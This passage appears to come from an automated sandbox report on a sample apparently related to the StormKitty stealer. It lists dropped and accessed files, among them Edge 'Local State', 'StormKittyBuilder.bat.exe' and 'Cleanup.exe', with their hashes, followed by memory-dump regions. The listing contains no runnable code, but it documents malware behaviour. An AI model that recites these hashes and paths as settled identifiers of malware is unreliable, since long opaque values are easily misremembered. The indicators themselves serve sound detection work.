                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                        Filesize

                                        4KB

                                        MD5

                                        8c5381ba2b968f6e81968ca3e48794bc

                                        SHA1

                                        d0f1160aecfd1f505592b049e19b7352a9ee1a0a

                                        SHA256

                                        d7f6d8d88ddd4cffec3d6f7bcbba097d7d44f9aca986fff27da8bc5003be0f2b

                                        SHA512

                                        c40f330cacc97430a4fb8322de615ec5d5e580f29321a184ea8b525a64076e4ef4f9549654c493c9a992e383fd51d507b520c0a3a828728ed66919d288847888

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        6KB

                                        MD5

                                        da2af709d06a2db4af32e767732680c2

                                        SHA1

                                        e653129a31114bbe09a0f66d3b1f9abe8924a9ae

                                        SHA256

                                        ae7985f4300a8c1f25c3884cab68f52506e3fefd3f632e6783e7610331e004e9

                                        SHA512

                                        890a60b1bfc2164bd75e98cd4e7bdd1e93f70188802e31606737e32c6efdf9031c45330401df0a511eb066ad0cefff8851495259aeda922326b9e5c9a52fd354

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        7KB

                                        MD5

                                        d0a1bb058b7f018f0820abfa248ef21b

                                        SHA1

                                        e2ddffb49482a8beb0b2702e4d81debf9d179930

                                        SHA256

                                        e4d77a3514ce39841dc929f5c4289331ce77525ef92c8bbd63ca90cdcd661389

                                        SHA512

                                        d0e93421805b9eb0be903335e2d0661f696cb777e1a16afc9a66bdc74ecf9f70ab41deaf90559eb4975771fdc2f614d6d8c119c1a0f18020f8720a6260d73c66

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        7332074ae2b01262736b6fbd9e100dac

                                        SHA1

                                        22f992165065107cc9417fa4117240d84414a13c

                                        SHA256

                                        baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

                                        SHA512

                                        4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

                                      • C:\Users\Admin\AppData\Local\Temp\StormKittyBuilder.bat.exe

                                        Filesize

                                        440KB

                                        MD5

                                        0e9ccd796e251916133392539572a374

                                        SHA1

                                        eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                        SHA256

                                        c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                        SHA512

                                        e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hyqwqa32.aqx.ps1

                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Local\Temp\debug_log.txt

                                        Filesize

                                        1KB

                                        MD5

                                        f3cb7da104ca6b7e4b6b3a33b33773c1

                                        SHA1

                                        a13c6a7a5f0874464dad9a9f3876163c789f0d3f

                                        SHA256

                                        b749a2215c1fe3871db9b20ee4d038bcf6aa73112d9bb7c3c8b558b9a653df08

                                        SHA512

                                        b12457d96bcb536be8c705b89bc02e12e3d0ff6213e66b04d5f267f03f88dbe99391930108e5169c1303cc8443d44841c4c283aa33b10cf380080d529582d1c0

                                      • C:\Users\Admin\AppData\Roaming\Cleanup.exe

                                        Filesize

                                        432KB

                                        MD5

                                        7cf5561ba84bda0718d0c93b2ab88d6b

                                        SHA1

                                        0c2a5bc7f8105b0d0017186a5a733cc6b6feff69

                                        SHA256

                                        449addfee92a5ca256cf35563ee3fb6e61380922803ef24db9aef5e376325458

                                        SHA512

                                        236b8a5acf67d4388638683db2616cda0b638774400c8be12effc1bec0e27c30516027675b8cacca22140d178da1a85c3fdac4e560644422d4b8b90d5d9400f8

                                      • memory/2944-28-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/2944-29-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/2944-40-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/2944-43-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-23-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-22-0x00007FFD72C80000-0x00007FFD72D3D000-memory.dmp

                                        Filesize

                                        756KB

                                      • memory/3108-56-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-25-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-84-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-83-0x00000150F6E80000-0x00000150F6F12000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/3108-24-0x00007FFD716A0000-0x00007FFD71A14000-memory.dmp

                                        Filesize

                                        3.5MB

                                      • memory/3108-26-0x00007FFD73770000-0x00007FFD7381E000-memory.dmp

                                        Filesize

                                        696KB

                                      • memory/3108-39-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-20-0x00007FFD73B80000-0x00007FFD73D89000-memory.dmp

                                        Filesize

                                        2.0MB

                                      • memory/3108-21-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-55-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-19-0x00000150F5E70000-0x00000150F5E7A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/3108-17-0x00000150F5EB0000-0x00000150F5F08000-memory.dmp

                                        Filesize

                                        352KB

                                      • memory/3108-155-0x00000150F6CD0000-0x00000150F6CFB000-memory.dmp

                                        Filesize

                                        172KB

                                      • memory/3108-16-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-187-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-15-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-228-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-13-0x00000150F5E20000-0x00000150F5E42000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/3108-14-0x00007FFD52D60000-0x00007FFD53822000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3108-30-0x00007FFD52D63000-0x00007FFD52D65000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3108-4-0x00007FFD52D63000-0x00007FFD52D65000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3108-27-0x00000150F6320000-0x00000150F638E000-memory.dmp

                                        Filesize

                                        440KB